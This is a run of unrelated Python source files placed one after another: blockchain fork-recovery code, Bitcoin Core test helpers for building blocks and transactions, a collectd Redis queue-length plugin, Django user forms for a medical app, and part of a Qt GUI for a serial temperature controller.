            fork_state.new_mainchain_hash_path.extend(hash_path)
            self._state.put_fork_state(fork_state)

        rollback_done = False
        if fork_state.old_mainchain_hash_path:
            b = self._state.get_block(fork_state.old_mainchain_hash_path[-1])
            if b and b.prev_headerhash == fork_state.fork_point_headerhash:
                rollback_done = True

        if not rollback_done:
            logger.info("Rolling back")
            old_hash_path = self._rollback(forked_header_hash, fork_state)
        else:
            old_hash_path = fork_state.old_mainchain_hash_path

        if not self.add_chain(hash_path[-1::-1], fork_state):
            logger.warning("Fork Recovery Failed... Recovering back to old mainchain")
            # If above condition is true, then it means, the node failed to add_chain
            # Thus old chain state, must be retrieved
            self._rollback(forked_header_hash)
            self.add_chain(old_hash_path[-1::-1], fork_state)  # Restores the old chain state
            return False

        logger.info("Fork Recovery Finished")

        self.trigger_miner = True
        return True

    def _add_block(self, block, batch=None, check_stale=True) -> (bool, bool):
        self.trigger_miner = False

        block_size_limit = self.get_block_size_limit(block)
        if block_size_limit and block.size > block_size_limit:
            logger.info('Block Size greater than threshold limit %s > %s', block.size, block_size_limit)
            return False, False

        return self._try_branch_add_block(block, batch, check_stale)

    def add_block(self, block: Block, check_stale=True) -> bool:
        with self.lock:
            if block.block_number < self.height - config.dev.reorg_limit:
                logger.debug('Skipping block #%s as beyond re-org limit', block.block_number)
                return False

            if self.get_block_is_duplicate(block):
                return False

            batch = self._state.batch
            block_flag, fork_flag = self._add_block(block, batch=batch, check_stale=check_stale)
            if block_flag:
                if not fork_flag:
                    self._state.write_batch(batch)
                logger.info('Added Block #%s %s', block.block_number, bin2hstr(block.headerhash))
                return True

            return False

    def _add_block_metadata(self,
                            headerhash,
                            block_timestamp,
                            parent_headerhash,
                            batch):
        block_metadata = self._state.get_block_metadata(headerhash)
        if not block_metadata:
            block_metadata = BlockMetadata.create()

        parent_metadata = self._state.get_block_metadata(parent_headerhash)

        parent_block_difficulty = parent_metadata.block_difficulty
        parent_cumulative_difficulty = parent_metadata.cumulative_difficulty

        block_metadata.update_last_headerhashes(parent_metadata.last_N_headerhashes, parent_headerhash)
        measurement = self._state.get_measurement(block_timestamp, parent_headerhash, parent_metadata)

        block_difficulty, _ = DifficultyTracker.get(
            measurement=measurement,
            parent_difficulty=parent_block_difficulty)

        block_cumulative_difficulty = StringToUInt256(str(
            int(UInt256ToString(block_difficulty)) +
            int(UInt256ToString(parent_cumulative_difficulty))))

        block_metadata.set_block_difficulty(block_difficulty)
        block_metadata.set_cumulative_difficulty(block_cumulative_difficulty)

        parent_metadata.add_child_headerhash(headerhash)
        self._state.put_block_metadata(parent_headerhash, parent_metadata, batch)
        self._state.put_block_metadata(headerhash, block_metadata, batch)

        return block_metadata

    def _update_block_number_mapping(self, block, batch):
        block_number_mapping = qrl_pb2.BlockNumberMapping(headerhash=block.headerhash,
                                                          prev_headerhash=block.prev_headerhash)
        self._state.put_block_number_mapping(block.block_number, block_number_mapping, batch)

#!/usr/bin/env python3
# Copyright (c) 2015-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Utilities for manipulating blocks and transactions."""

import struct
import time
import unittest

from .address import (
    key_to_p2sh_p2wpkh,
    key_to_p2wpkh,
    script_to_p2sh_p2wsh,
    script_to_p2wsh,
)
from .messages import (
    CBlock,
    COIN,
    COutPoint,
    CTransaction,
    CTxIn,
    CTxInWitness,
    CTxOut,
    hash256,
    ser_uint256,
    tx_from_hex,
    uint256_from_str,
)
from .script import (
    CScript,
    CScriptNum,
    CScriptOp,
    OP_1,
    OP_CHECKMULTISIG,
    OP_CHECKSIG,
    OP_RETURN,
    OP_TRUE,
)
from .script_util import (
    key_to_p2wpkh_script,
    script_to_p2wsh_script,
)
from .util import assert_equal

WITNESS_SCALE_FACTOR = 4
MAX_BLOCK_SIGOPS = 20000
MAX_BLOCK_SIGOPS_WEIGHT = MAX_BLOCK_SIGOPS * WITNESS_SCALE_FACTOR

# Genesis block time (regtest)
TIME_GENESIS_BLOCK = 1296688602

# Coinbase transaction outputs can only be spent after this number of new blocks (network rule)
COINBASE_MATURITY = 100

# Soft-fork activation heights
DERSIG_HEIGHT = 102  # BIP 66
CLTV_HEIGHT = 111  # BIP 65
CSV_ACTIVATION_HEIGHT = 432

# From BIP141
WITNESS_COMMITMENT_HEADER = b"\xaa\x21\xa9\xed"

NORMAL_GBT_REQUEST_PARAMS = {"rules": ["segwit"]}
VERSIONBITS_LAST_OLD_BLOCK_VERSION = 4


def create_block(hashprev=None, coinbase=None, ntime=None, *, version=None, tmpl=None, txlist=None):
    """Create a block (with regtest difficulty)."""
    block = CBlock()
    if tmpl is None:
        tmpl = {}
    block.nVersion = version or tmpl.get('version') or VERSIONBITS_LAST_OLD_BLOCK_VERSION
    block.nTime = ntime or tmpl.get('curtime') or int(time.time() + 600)
    block.hashPrevBlock = hashprev or int(tmpl['previousblockhash'], 0x10)
    if tmpl and not tmpl.get('bits') is None:
        block.nBits = struct.unpack('>I', bytes.fromhex(tmpl['bits']))[0]
    else:
        block.nBits = 0x207fffff  # difficulty retargeting is disabled in REGTEST chainparams
    if coinbase is None:
        coinbase = create_coinbase(height=tmpl['height'])
    block.vtx.append(coinbase)
    if txlist:
        for tx in txlist:
            if not hasattr(tx, 'calc_sha256'):
                tx = tx_from_hex(tx)
            block.vtx.append(tx)
    block.hashMerkleRoot = block.calc_merkle_root()
    block.calc_sha256()
    return block

def get_witness_script(witness_root, witness_nonce):
    witness_commitment = uint256_from_str(hash256(ser_uint256(witness_root) + ser_uint256(witness_nonce)))
    output_data = WITNESS_COMMITMENT_HEADER + ser_uint256(witness_commitment)
    return CScript([OP_RETURN, output_data])

def add_witness_commitment(block, nonce=0):
    """Add a witness commitment to the block's coinbase transaction.

    According to BIP141, blocks with witness rules active must commit to the
    hash of all in-block transactions including witness."""
    # First calculate the merkle root of the block's
    # transactions, with witnesses.
    witness_nonce = nonce
    witness_root = block.calc_witness_merkle_root()
    # witness_nonce should go to coinbase witness.
    block.vtx[0].wit.vtxinwit = [CTxInWitness()]
    block.vtx[0].wit.vtxinwit[0].scriptWitness.stack = [ser_uint256(witness_nonce)]

    # witness commitment is the last OP_RETURN output in coinbase
    block.vtx[0].vout.append(CTxOut(0, get_witness_script(witness_root, witness_nonce)))
    block.vtx[0].rehash()
    block.hashMerkleRoot = block.calc_merkle_root()
    block.rehash()


def script_BIP34_coinbase_height(height):
    if height <= 16:
        res = CScriptOp.encode_op_n(height)
        # Append dummy to increase scriptSig size above 2 (see bad-cb-length consensus rule)
        return CScript([res, OP_1])
    return CScript([CScriptNum(height)])


def create_coinbase(height, pubkey=None, extra_output_script=None, fees=0, nValue=50):
    """Create a coinbase transaction.

    If pubkey is passed in, the coinbase output will be a P2PK output;
    otherwise an anyone-can-spend output.

    If extra_output_script is given, make a 0-value output to that
    script. This is useful to pad block weight/sigops as needed. """
    coinbase = CTransaction()
    coinbase.vin.append(CTxIn(COutPoint(0, 0xffffffff), script_BIP34_coinbase_height(height), 0xffffffff))
    coinbaseoutput = CTxOut()
    coinbaseoutput.nValue = nValue * COIN
    if nValue == 50:
        halvings = int(height / 150)  # regtest
        coinbaseoutput.nValue >>= halvings
        coinbaseoutput.nValue += fees
    if pubkey is not None:
        coinbaseoutput.scriptPubKey = CScript([pubkey, OP_CHECKSIG])
    else:
        coinbaseoutput.scriptPubKey = CScript([OP_TRUE])
    coinbase.vout = [coinbaseoutput]
    if extra_output_script is not None:
        coinbaseoutput2 = CTxOut()
        coinbaseoutput2.nValue = 0
        coinbaseoutput2.scriptPubKey = extra_output_script
        coinbase.vout.append(coinbaseoutput2)
    coinbase.calc_sha256()
    return coinbase

def create_tx_with_script(prevtx, n, script_sig=b"", *, amount, script_pub_key=CScript()):
    """Return one-input, one-output transaction object
       spending the prevtx's n-th output with the given amount.

       Can optionally pass scriptPubKey and scriptSig, default is anyone-can-spend output.
    """
    tx = CTransaction()
    assert n < len(prevtx.vout)
    tx.vin.append(CTxIn(COutPoint(prevtx.sha256, n), script_sig, 0xffffffff))
    tx.vout.append(CTxOut(amount, script_pub_key))
    tx.calc_sha256()
    return tx

def create_transaction(node, txid, to_address, *, amount):
    """ Return signed transaction spending the first output of the
        input txid. Note that the node must have a wallet that can
        sign for the output that is being spent.
    """
    raw_tx = create_raw_transaction(node, txid, to_address, amount=amount)
    tx = tx_from_hex(raw_tx)
    return tx

def create_raw_transaction(node, txid, to_address, *, amount):
    """ Return raw signed transaction spending the first output of the
        input txid. Note that the node must have a wallet that can sign
        for the output that is being spent.
    """
    psbt = node.createpsbt(inputs=[{"txid": txid, "vout": 0}], outputs={to_address: amount})
    for _ in range(2):
        for w in node.listwallets():
            wrpc = node.get_wallet_rpc(w)
            signed_psbt = wrpc.walletprocesspsbt(psbt)
            psbt = signed_psbt['psbt']
    final_psbt = node.finalizepsbt(psbt)
    assert_equal(final_psbt["complete"], True)
    return final_psbt['hex']

def get_legacy_sigopcount_block(block, accurate=True):
    count = 0
    for tx in block.vtx:
        count += get_legacy_sigopcount_tx(tx, accurate)
    return count

def get_legacy_sigopcount_tx(tx, accurate=True):
    count = 0
    for i in tx.vout:
        count += i.scriptPubKey.GetSigOpCount(accurate)
    for j in tx.vin:
        # scriptSig might be of type bytes, so convert to CScript for the moment
        count += CScript(j.scriptSig).GetSigOpCount(accurate)
    return count

def witness_script(use_p2wsh, pubkey):
    """Create a scriptPubKey for a pay-to-witness TxOut.

    This is either a P2WPKH output for the given pubkey, or a P2WSH output of a
    1-of-1 multisig for the given pubkey. Returns the hex encoding of the
    scriptPubKey."""
    if not use_p2wsh:
        # P2WPKH instead
        pkscript = key_to_p2wpkh_script(pubkey)
    else:
        # 1-of-1 multisig
        witness_script = CScript([OP_1, bytes.fromhex(pubkey), OP_1, OP_CHECKMULTISIG])
        pkscript = script_to_p2wsh_script(witness_script)
    return pkscript.hex()

def create_witness_tx(node, use_p2wsh, utxo, pubkey, encode_p2sh, amount):
    """Return a transaction (in hex) that spends the given utxo to a segwit output.

    Optionally wrap the segwit output using P2SH."""
    if use_p2wsh:
        program = CScript([OP_1, bytes.fromhex(pubkey), OP_1, OP_CHECKMULTISIG])
        addr = script_to_p2sh_p2wsh(program) if encode_p2sh else script_to_p2wsh(program)
    else:
        addr = key_to_p2sh_p2wpkh(pubkey) if encode_p2sh else key_to_p2wpkh(pubkey)
    if not encode_p2sh:
        assert_equal(node.getaddressinfo(addr)['scriptPubKey'], witness_script(use_p2wsh, pubkey))
    return node.createrawtransaction([utxo], {addr: amount})

def send_to_witness(use_p2wsh, node, utxo, pubkey, encode_p2sh, amount, sign=True, insert_redeem_script=""):
    """Create a transaction spending a given utxo to a segwit output.

    The output corresponds to the given pubkey: use_p2wsh determines whether to
    use P2WPKH or P2WSH; encode_p2sh determines whether to wrap in P2SH.
    sign=True will have the given node sign the transaction.
    insert_redeem_script will be added to the scriptSig, if given."""
    tx_to_witness = create_witness_tx(node, use_p2wsh, utxo, pubkey, encode_p2sh, amount)
    if (sign):
        signed = node.signrawtransactionwithwallet(tx_to_witness)
        assert "errors" not in signed or len(["errors"]) == 0
        return node.sendrawtransaction(signed["hex"])
    else:
        if (insert_redeem_script):
            tx = tx_from_hex(tx_to_witness)
            tx.vin[0].scriptSig += CScript([bytes.fromhex(insert_redeem_script)])
            tx_to_witness = tx.serialize().hex()

    return node.sendrawtransaction(tx_to_witness)

class TestFrameworkBlockTools(unittest.TestCase):
    def test_create_coinbase(self):
        height = 20
        coinbase_tx = create_coinbase(height=height)
        assert_equal(CScriptNum.decode(coinbase_tx.vin[0].scriptSig), height)

# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; only version 2 of the License is applicable.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA  02110-1301 USA

# This plugin is to monitor queue lengths in Redis. Based on redis_info.py by
# Garret Heaton <powdahound at gmail.com>, hence the GPL at the top.

import collectd
from contextlib import closing, contextmanager
import socket


# Host to connect to. Override in config by specifying 'Host'.
REDIS_HOST = 'localhost'

# Port to connect on. Override in config by specifying 'Port'.
REDIS_PORT = 6379

# Verbose logging on/off. Override in config by specifying 'Verbose'.
VERBOSE_LOGGING = False

# Queue names to monitor. Override in config by specifying 'Queues'.
QUEUE_NAMES = []


def fetch_queue_lengths(queue_names):
    """Connect to Redis server and request queue lengths.
    
    Return a dictionary from queue names to integers.
    
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((REDIS_HOST, REDIS_PORT))
        log_verbose('Connected to Redis at %s:%s' % (REDIS_HOST, REDIS_PORT))
    except socket.error, e:
        collectd.error('redis_queues plugin: Error connecting to %s:%d - %r'
                       % (REDIS_HOST, REDIS_PORT, e))
        return None

    queue_lengths = {}

    with closing(s) as redis_socket:
        for queue_name in queue_names:
            log_verbose('Requesting length of queue %s' % queue_name)
            redis_socket.sendall('llen %s\r\n' % queue_name)
            with closing(redis_socket.makefile('r')) as response_file:
                response = response_file.readline()
            if response.startswith(':'):
                try:
                    queue_lengths[queue_name] = int(response[1:-1])
                except ValueError:
                    log_verbose('Invalid response: %r' % response)
            else:
                log_verbose('Invalid response: %r' % response)

    return queue_lengths


def configure_callback(conf):
    """Receive configuration block"""
    global REDIS_HOST, REDIS_PORT, VERBOSE_LOGGING, QUEUE_NAMES
    for node in conf.children:
        if node.key == 'Host':
            REDIS_HOST = node.values[0]
        elif node.key == 'Port':
            REDIS_PORT = int(node.values[0])
        elif node.key == 'Verbose':
            VERBOSE_LOGGING = bool(node.values[0])
        elif node.key == 'Queues':
            QUEUE_NAMES = list(node.values)
        else:
            collectd.warning('redis_queues plugin: Unknown config key: %s.'
                             % node.key)
    log_verbose('Configured with host=%s, port=%s' % (REDIS_HOST, REDIS_PORT))
    for queue in QUEUE_NAMES:
        log_verbose('Watching queue %s' % queue)
    if not QUEUE_NAMES:
        log_verbose('Not watching any queues')


def read_callback():
    log_verbose('Read callback called')
    queue_lengths = fetch_queue_lengths(QUEUE_NAMES)

    if queue_lengths is None:
        # An earlier error, reported to collectd by fetch_queue_lengths
        return

    for queue_name, queue_length in queue_lengths.items():
        log_verbose('Sending value: %s=%s' % (queue_name, queue_length))

        val = collectd.Values(plugin='redis_queues')
        val.type = 'gauge'
        val.type_instance = queue_name
        val.values = [queue_length]
        val.dispatch()


def log_verbose(msg):
    if not VERBOSE_LOGGING:
        return
    collectd.info('redis plugin [verbose]: %s' % msg)


# register callbacks
collectd.register_config(configure_callback)
collectd.register_read(read_callback)

from .DiscreteFactor import State, DiscreteFactor
from .CPD import TabularCPD
from .JointProbabilityDistribution import JointProbabilityDistribution

__all__ = ['TabularCPD',
           'DiscreteFactor',
           'State'
           ]

from crispy_forms.helper import FormHelper
from crispy_forms.layout import Fieldset, Layout
from django import forms
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth.models import User
from django.contrib.auth.password_validation import validate_password
from django.core.exceptions import ValidationError
from django.db import transaction
from django.forms import ModelForm
from django.utils.translation import ugettext_lazy as _
from django_filters import FilterSet
from easy_select2 import Select2

from crispy_layout_mixin import form_actions, to_row
from utils import (TIPO_TELEFONE, YES_NO_CHOICES, get_medicos,
                   get_or_create_grupo)

from .models import Especialidade, EspecialidadeMedico, Usuario


class EspecialidadeMedicoFilterSet(FilterSet):

    class Meta:
        model = EspecialidadeMedico
        fields = ['especialidade']

    def __init__(self, *args, **kwargs):
        super(EspecialidadeMedicoFilterSet, self).__init__(*args, **kwargs)

        row1 = to_row([('especialidade', 12)])

        self.form.helper = FormHelper()
        self.form.helper.form_method = 'GET'
        self.form.helper.layout = Layout(
            Fieldset(_('Pesquisar Médico'),
                     row1, form_actions(save_label='Filtrar'))
        )


class MudarSenhaForm(forms.Form):
    nova_senha = forms.CharField(
        label="Nova Senha", max_length=30,
        widget=forms.PasswordInput(
          attrs={'class': 'form-control form-control-lg',
                 'name': 'senha',
                 'placeholder': 'Nova Senha'}))

    confirmar_senha = forms.CharField(
        label="Confirmar Senha", max_length=30,
        widget=forms.PasswordInput(
          attrs={'class': 'form-control form-control-lg',
                 'name': 'confirmar_senha',
                 'placeholder': 'Confirmar Senha'}))


class LoginForm(AuthenticationForm):
    username = forms.CharField(
        label="Username", max_length=30,
        widget=forms.TextInput(
            attrs={'class': 'form-control form-control-lg',
                   'name': 'username',
                   'placeholder': 'Usuário'}))

    password = forms.CharField(
        label="Password", max_length=30,
        widget=forms.PasswordInput(
            attrs={'class': 'form-control',
                   'name': 'password',
                   'placeholder': 'Senha'}))


class UsuarioForm(ModelForm):

    # Usuário
    password = forms.CharField(
        max_length=20,
        label=_('Senha'),
        widget=forms.PasswordInput())

    password_confirm = forms.CharField(
        max_length=20,
        label=_('Confirmar Senha'),
        widget=forms.PasswordInput())

    class Meta:
        model = Usuario
        fields = ['username', 'email', 'nome', 'password', 'password_confirm',
                  'data_nascimento', 'sexo', 'plano', 'tipo', 'cep', 'end',
                  'numero', 'complemento', 'bairro', 'referencia',
                  'primeiro_telefone', 'segundo_telefone']

        widgets = {'email': forms.TextInput(
                               attrs={'style': 'text-transform:lowercase;'})}

    def __init__(self, *args, **kwargs):
        super(UsuarioForm, self).__init__(*args, **kwargs)
        self.fields['primeiro_telefone'].widget.attrs['class'] = 'telefone'
        self.fields['segundo_telefone'].widget.attrs['class'] = 'telefone'

    def valida_igualdade(self, texto1, texto2, msg):
        if texto1 != texto2:
            raise ValidationError(msg)
        return True

    def clean(self):

        if ('password' not in self.cleaned_data or
                'password_confirm' not in self.cleaned_data):
            raise ValidationError(_('Favor informar senhas atuais ou novas'))

        msg = _('As senhas não conferem.')
        self.valida_igualdade(
            self.cleaned_data['password'],
            self.cleaned_data['password_confirm'],
            msg)

        try:
            validate_password(self.cleaned_data['password'])
        except ValidationError as error:
            raise ValidationError(error)

        return self.cleaned_data

    @transaction.atomic
    def save(self, commit=False):
        usuario = super(UsuarioForm, self).save(commit)

        # Cria User
        u = User.objects.create(username=usuario.username, email=usuario.email)
        u.set_password(self.cleaned_data['password'])
        u.is_active = True
        u.groups.add(get_or_create_grupo(self.cleaned_data['tipo'].descricao))

        u.save()
        usuario.user = u
        usuario.save()
        return usuario


class UsuarioEditForm(ModelForm):

    # Primeiro Telefone
    primeiro_tipo = forms.ChoiceField(
        widget=forms.Select(),
        choices=TIPO_TELEFONE,
        label=_('Tipo Telefone'))
    primeiro_ddd = forms.CharField(max_length=2, label=_('DDD'))
    primeiro_numero = forms.CharField(max_length=10, label=_('Número'))
    primeiro_principal = forms.TypedChoiceField(
        widget=forms.Select(),
        label=_('Telefone Principal?'),
        choices=YES_NO_CHOICES)

    # Primeiro Telefone
    segundo_tipo = forms.ChoiceField(
        required=False,
        widget=forms.Select(),
        choices=TIPO_TELEFONE,
        label=_('Tipo Telefone'))
    segundo_ddd = forms.CharField(required=False, max_length=2, label=_('DDD'))
    segundo_numero = forms.CharField(
        required=False, max_length=10, label=_('Número'))
    segundo_principal = forms.ChoiceField(
        required=False,
        widget=forms.Select(),
        label=_('Telefone Principal?'),
        choices=YES_NO_CHOICES)

    class Meta:
        model = Usuario
        fields = ['username', 'email', 'nome', 'data_nascimento', 'sexo',
                  'plano', 'tipo', 'cep', 'end', 'numero', 'complemento',
                  'bairro', 'referencia', 'primeiro_telefone',
                  'segundo_telefone']

        widgets = {'username': forms.TextInput(attrs={'readonly': 'readonly'}),
                   'email': forms.TextInput(
                                 attrs={'style': 'text-transform:lowercase;'}),
                   }

    def __init__(self, *args, **kwargs):
        super(UsuarioEditForm, self).__init__(*args, **kwargs)
        self.fields['primeiro_telefone'].widget.attrs['class'] = 'telefone'
        self.fields['segundo_telefone'].widget.attrs['class'] = 'telefone'

    def valida_igualdade(self, texto1, texto2, msg):
        if texto1 != texto2:
            raise ValidationError(msg)
        return True

    def clean_primeiro_numero(self):
        cleaned_data = self.cleaned_data

        telefone = Telefone()
        telefone.tipo = self.data['primeiro_tipo']
        telefone.ddd = self.data['primeiro_ddd']
        telefone.numero = self.data['primeiro_numero']
        telefone.principal = self.data['primeiro_principal']

        cleaned_data['primeiro_telefone'] = telefone
        return cleaned_data

    def clean_segundo_numero(self):
        cleaned_data = self.cleaned_data

        telefone = Telefone()
        telefone.tipo = self.data['segundo_tipo']
        telefone.ddd = self.data['segundo_ddd']
        telefone.numero = self.data['segundo_numero']
        telefone.principal = self.data['segundo_principal']

        cleaned_data['segundo_telefone'] = telefone
        return cleaned_data

    @transaction.atomic
    def save(self, commit=False):
        usuario = super(UsuarioEditForm, self).save(commit)

        # Primeiro telefone
        tel = usuario.primeiro_telefone

        tel.tipo = self.data['primeiro_tipo']
        tel.ddd = self.data['primeiro_ddd']
        tel.numero = self.data['primeiro_numero']
        tel.principal = self.data['primeiro_principal']
        tel.save()

        usuario.primeiro_telefone = tel

        # Segundo telefone
        tel = usuario.segundo_telefone

        if tel:
            tel.tipo = self.data['segundo_tipo']
            tel.ddd = self.data['segundo_ddd']
            tel.numero = self.data['segundo_numero']
            tel.principal = self.data['segundo_principal']
            tel.save()
            usuario.segundo_telefone = tel

        # User
        u = usuario.user
        u.email = usuario.email
        u.groups.remove(u.groups.first())
        u.groups.add(get_or_create_grupo(self.cleaned_data['tipo'].descricao))

        u.save()
        usuario.save()
        return usuario


class EspecialidadeMedicoForm(ModelForm):

    medico = forms.ModelChoiceField(
        queryset=get_medicos(),
        widget=Select2(select2attrs={'width': '535px'}))

    especialidade = forms.ModelChoiceField(
        queryset=Especialidade.objects.all(),
        widget=Select2(select2attrs={'width': '535px'}))

    class Meta:
        model = EspecialidadeMedico
        fields = ['especialidade', 'medico']

#! python3

"""
    GUI for Ultrasonic Temperature Controller
    Copyright (c) 2015 by Stefan Lehmann

"""

import os
import datetime
import logging
import json

import serial
from qtpy.QtWidgets import QAction, QDialog, QMainWindow, QMessageBox, \
    QDockWidget, QLabel, QFileDialog, QApplication
from qtpy.QtGui import QIcon
from qtpy.QtCore import QSettings, QCoreApplication, Qt, QThread, \
    Signal

from serial.serialutil import SerialException
from jsonwatch.jsonitem import JsonItem
from jsonwatch.jsonnode import JsonNode
from jsonwatchqt.logger import LoggingWidget
from pyqtconfig.config import QSettingsManager
from jsonwatchqt.plotsettings import PlotSettingsWidget
from jsonwatchqt.objectexplorer import ObjectExplorer
from jsonwatchqt.plotwidget import PlotWidget
from jsonwatchqt.serialdialog import SerialDialog, PORT_SETTING, \
    BAUDRATE_SETTING
from jsonwatchqt.utilities import critical, pixmap
from jsonwatchqt.recorder import RecordWidget
from jsonwatchqt.csvsettings import CSVSettingsDialog, DECIMAL_SETTING, \
    SEPARATOR_SETTING


logger = logging.getLogger("jsonwatchqt.mainwindow")
WINDOWSTATE_SETTING = "mainwindow/windowstate"
GEOMETRY_SETTING = "mainwindow/geometry"
FILENAME_SETTING = "mainwindow/filename"


def strip(s):
    return s.strip()


def utf8_to_bytearray(x):
    return bytearray(x, 'utf-8')


def bytearray_to_utf8(x):
    return x.decode('utf-8')


def set_default_settings(settings: QSettingsManager):
    settings.set_defaults({
        DECIMAL_SETTING: ',',
        SEPARATOR_SETTING: ';'
    })


class SerialWorker(QThread):
    data_received = Signal(datetime.datetime, str)

    def __init__(self, ser: serial.Serial, parent=None):
        super().__init__(parent)
        self.serial = ser
        self._quit = False

    def run(self):
        while not self._quit:
            try:
                if self.serial.isOpen() and self.serial.inWaiting():
                    self.data_received.emit(
                        datetime.datetime.now(),
                        strip(bytearray_to_utf8(self.serial.readline()))
                    )
            except SerialException:
                pass

    def quit(self):
        self._quit = True


class MainWindow(QMainWindow):

    def __init__(self, parent=None):
        super().__init__(parent)
        self.recording_enabled = False
        self.serial = serial.Serial()
        self.rootnode = JsonNode('')
        self._connected = False
        self._dirty = False
        self._filename = None

        # settings
        self.settings = QSettingsManager()
        set_default_settings(self.settings)

        # Controller Settings
        self.settingsDialog = None

        # object explorer
        self.objectexplorer = ObjectExplorer(self.rootnode, self)
        self.objectexplorer.nodevalue_changed.connect(self.send_serialdata)
        self.objectexplorer.nodeproperty_changed.connect(self.set_dirty)
        self.objectexplorerDockWidget = QDockWidget(self.tr("object explorer"),
                                                    self)
        self.objectexplorerDockWidget.setObjectName(
            "objectexplorer_dockwidget")
        self.objectexplorerDockWidget.setWidget(self.objectexplorer)

        # plot widget
        self.plot = PlotWidget(self.rootnode, self.settings, self)

        # plot settings
        self.plotsettings = PlotSettingsWidget(self.settings, self.plot, self)
        self.plotsettingsDockWidget = QDockWidget(self.tr("plot settings"),
                                                  self)
        self.plotsettingsDockWidget.setObjectName("plotsettings_dockwidget")
        self.plotsettingsDockWidget.setWidget(self.plotsettings)

        # log widget
        self.loggingWidget = LoggingWidget(self)
        self.loggingDockWidget = QDockWidget(self.tr("logger"), self)
        self.loggingDockWidget.setObjectName("logging_dockwidget")
        self.loggingDockWidget.setWidget(self.loggingWidget)

        # record widget
        self.recordWidget = RecordWidget(self.rootnode, self)
        self.recordDockWidget = QDockWidget(self.tr("data recording"), self)
        self.recordDockWidget.setObjectName("record_dockwidget")
        self.recordDockWidget.setWidget(self.recordWidget)

        # actions and menus
        self._init_actions()
        self._init_menus()

        # statusbar
        statusbar = self.statusBar()
        statusbar.setVisible(True)
        self.connectionstateLabel = QLabel(self.tr("Not connected"))
        statusbar.addPermanentWidget(self.connectionstateLabel)
        statusbar.showMessage(self.tr("Ready"))

        # layout
        self.setCentralWidget(self.plot)
        self.addDockWidget(Qt.LeftDockWidgetArea,
                           self.objectexplorerDockWidget)
        self.addDockWidget(Qt.LeftDockWidgetArea, self.plotsettingsDockWidget)
        self.addDockWidget(Qt.BottomDockWidgetArea, self.loggingDockWidget)
        self.addDockWidget(Qt.BottomDockWidgetArea, self.recordDockWidget)

        self.load_settings()

    def _init_actions(self):
        # Serial Dialog
        self.serialdlgAction = QAction(self.tr("Serial Settings..."), self)
        self.serialdlgAction.setShortcut("F6")
        self.serialdlgAction.setIcon(QIcon(pixmap("configure.png")))
        self.serialdlgAction.triggered.connect(self.show_serialdlg)

        # Connect
        self.connectAction = QAction(self.tr("Connect"), self)
        self.connectAction.setShortcut("F5")
        self.connectAction.setIcon(QIcon(pixmap("network-connect-3.png")))
        self.connectAction.triggered.connect(self.toggle_connect)

        # Quit
        self.quitAction = QAction(self.tr("Quit"), self)
        self.quitAction.setShortcut("Alt+F4")
        self.quitAction.setIcon(QIcon(pixmap("window-close-3.png")))
        self.quitAction.triggered.connect(self.close)

        # Save Config as
        self.saveasAction = QAction(self.tr("Save as..."), self)
        self.saveasAction.setShortcut("Ctrl+Shift+S")
        self.saveasAction.setIcon(QIcon(pixmap("document-save-as-5.png")))
        self.saveasAction.triggered.connect(self.show_savecfg_dlg)

        # Save file
        self.saveAction = QAction(self.tr("Save"), self)
        self.saveAction.setShortcut("Ctrl+S")
        self.saveAction.setIcon(QIcon(pixmap("document-save-5.png")))
        self.saveAction.triggered.connect(self.save_file)

        # Load file
        self.loadAction = QAction(self.tr("Open..."), self)
        self.loadAction.setShortcut("Ctrl+O")
        self.loadAction.setIcon(QIcon(pixmap("document-open-7.png")))
        self.loadAction.triggered.connect(self.show_opencfg_dlg)

        # New
        self.newAction = QAction(self.tr("New"), self)
        self.newAction.setShortcut("Ctrl+N")
        self.newAction.setIcon(QIcon(pixmap("document-new-6.png")))
        self.newAction.triggered.connect(self.new)

        # start recording
        self.startrecordingAction = QAction(self.tr("Start recording"), self)
        self.startrecordingAction.setShortcut("F9")
        self.startrecordingAction.setIcon(QIcon(pixmap("media-record-6.png")))
        self.startrecordingAction.triggered.connect(self.start_recording)

        # stop recording
        self.stoprecordingAction = QAction(self.tr("Stop recording"), self)
        self.stoprecordingAction.setShortcut("F10")
        self.stoprecordingAction.setIcon(QIcon(pixmap("media-playback-stop-8.png")))
        self.stoprecordingAction.setEnabled(False)
        self.stoprecordingAction.triggered.connect(self.stop_recording)

        # clear record
        self.clearrecordAction = QAction(self.tr("Clear"), self)
        self.clearrecordAction.setIcon(QIcon(pixmap("editclear.png")))
        self.clearrecordAction.triggered.connect(self.clear_record)

        # export record
        self.exportcsvAction = QAction(self.tr("Export to csv..."), self)
        self.exportcsvAction.setIcon(QIcon(pixmap("text_csv.png")))
        self.exportcsvAction.triggered.connect(self.export_csv)

        # show record settings
        self.recordsettingsAction = QAction(self.tr("Settings..."), self)
        self.recordsettingsAction.setIcon(QIcon(pixmap("configure.png")))
        self.recordsettingsAction.triggered.connect(self.show_recordsettings)

        # Info
        self.infoAction = QAction(self.tr("Info"), self)
        self.infoAction.setShortcut("F1")
        self.infoAction.triggered.connect(self.show_info)

    def _init_menus(self):
        # file menu
        self.fileMenu = self.menuBar().addMenu(self.tr("File"))
        self.fileMenu.addAction(self.newAction)
        self.fileMenu.addAction(self.loadAction)
        self.fileMenu.addAction(self.saveAction)
        self.fileMenu.addAction(self.saveasAction)
        self.fileMenu.addSeparator()
        self.fileMenu.addAction(self.connectAction)
        self.fileMenu.addAction(self.serialdlgAction)
        self.fileMenu.addSeparator()
        self.fileMenu.addAction(self.quitAction)

        # view menu
        self.viewMenu = self.menuBar().addMenu(self.tr("View"))
        self.viewMenu.addAction(
            self.objectexplorerDockWidget.toggleViewAction())
        self.viewMenu.addAction(self.plotsettingsDockWidget.toggleViewAction())
        self.viewMenu.addAction(self.loggingDockWidget.toggleViewAction())
        self.viewMenu.addAction(self.recordDockWidget.toggleViewAction())

        # record menu
        self.recordMenu = self.menuBar().addMenu(self.tr("Record"))
